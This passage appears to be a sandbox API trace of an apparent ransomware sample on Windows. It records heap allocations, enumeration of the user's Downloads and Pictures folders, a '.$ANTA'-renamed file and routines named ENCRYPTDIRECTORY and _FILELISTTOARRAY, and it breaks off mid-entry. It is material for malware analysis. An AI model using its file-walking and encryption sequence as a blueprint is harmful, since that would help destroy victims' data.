RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d758 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.376] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\" (normalized: "c:\\users\\fd1hvy\\downloads")) returned 0x11 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c20 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0086.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0086.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0086.377] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xff9d1e93, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xff9d1e93, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9e00, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0086.378] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xff9d1e93, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xff9d1e93, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9e00, cFileName="..", cAlternateFileName="")) returned 1 [0086.378] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff6d708c, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xff6d708c, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xff9d1e93, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x43c9e00, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0086.378] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0086.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cf8 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d10 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0086.379] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e23f0, ftCreationTime.dwHighDateTime=0x144eff0, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e23f0, ftLastWriteTime.dwLowDateTime=0x43ea508, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="", cAlternateFileName="ﮀмńဓ+\x10")) returned 0 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d10 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0086.379] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0086.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0086.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cf8 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c08 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e00 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c20 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d10 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ea8 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0086.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0086.381] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0086.381] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c99c8 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0086.381] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x144f3f8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9aa0 [0086.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431db18 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9938 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b18 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0086.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0086.382] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0086.382] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0086.382] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe852798d, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe852798d, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9bd8, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0086.382] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe852798d, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe852798d, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9bd8, cFileName="..", cAlternateFileName="")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da9ae0, ftCreationTime.dwHighDateTime=0x1d5ef3a, ftLastAccessTime.dwLowDateTime=0x802e2550, ftLastAccessTime.dwHighDateTime=0x1d5eeca, ftLastWriteTime.dwLowDateTime=0x802e2550, ftLastWriteTime.dwHighDateTime=0x1d5eeca, nFileSizeHigh=0x0, nFileSizeLow=0xc7e0, dwReserved0=0x0, dwReserved1=0x43c9bd8, cFileName="0Vl-GMFm9nq0tPej.bmp", cAlternateFileName="0VL-GM~1.BMP")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb9d9970, ftCreationTime.dwHighDateTime=0x1d5e4b9, ftLastAccessTime.dwLowDateTime=0xb5223e70, ftLastAccessTime.dwHighDateTime=0x1d5e2a1, ftLastWriteTime.dwLowDateTime=0xb5223e70, ftLastWriteTime.dwHighDateTime=0x1d5e2a1, nFileSizeHigh=0x0, nFileSizeLow=0x8c24, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="5MOGH3JqsJ.bmp", cAlternateFileName="5MOGH3~1.BMP")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd22c4e00, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0x3438bd60, ftLastAccessTime.dwHighDateTime=0x1d5e4cd, ftLastWriteTime.dwLowDateTime=0x3438bd60, ftLastWriteTime.dwHighDateTime=0x1d5e4cd, nFileSizeHigh=0x0, nFileSizeLow=0xca29, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="9TpncYB524P.bmp", cAlternateFileName="9TPNCY~1.BMP")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb170c140, ftCreationTime.dwHighDateTime=0x1d5e759, ftLastAccessTime.dwLowDateTime=0x7eeac220, ftLastAccessTime.dwHighDateTime=0x1d5ec54, ftLastWriteTime.dwLowDateTime=0x7eeac220, ftLastWriteTime.dwHighDateTime=0x1d5ec54, nFileSizeHigh=0x0, nFileSizeLow=0x7fc1, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="BWdI74zS0.bmp", cAlternateFileName="BWDI74~1.BMP")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd45bd980, ftCreationTime.dwHighDateTime=0x1d5e6c6, ftLastAccessTime.dwLowDateTime=0x603183b0, ftLastAccessTime.dwHighDateTime=0x1d5ee5b, ftLastWriteTime.dwLowDateTime=0x603183b0, ftLastWriteTime.dwHighDateTime=0x1d5ee5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="cLIkSZ", cAlternateFileName="")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66b95a40, ftCreationTime.dwHighDateTime=0x1d5ed44, ftLastAccessTime.dwLowDateTime=0xe0c46f90, ftLastAccessTime.dwHighDateTime=0x1d5e287, ftLastWriteTime.dwLowDateTime=0xe0c46f90, ftLastWriteTime.dwHighDateTime=0x1d5e287, nFileSizeHigh=0x0, nFileSizeLow=0x1463f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="eY_MSASCT-tpPguP.bmp", cAlternateFileName="EY_MSA~1.BMP")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c9ef0, ftCreationTime.dwHighDateTime=0x1d5e33b, ftLastAccessTime.dwLowDateTime=0x3d10c320, ftLastAccessTime.dwHighDateTime=0x1d5ed46, ftLastWriteTime.dwLowDateTime=0x3d10c320, ftLastWriteTime.dwHighDateTime=0x1d5ed46, nFileSizeHigh=0x0, nFileSizeLow=0x19ab, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="fW_IRtjvKhZB-.bmp", cAlternateFileName="FW_IRT~1.BMP")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4964680, ftCreationTime.dwHighDateTime=0x1d5eda8, ftLastAccessTime.dwLowDateTime=0xa9998330, ftLastAccessTime.dwHighDateTime=0x1d5ec95, ftLastWriteTime.dwLowDateTime=0xa9998330, ftLastWriteTime.dwHighDateTime=0x1d5ec95, nFileSizeHigh=0x0, nFileSizeLow=0xf65b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="GbOsv53gLsdhP15shLc.jpg", cAlternateFileName="GBOSV5~1.JPG")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: 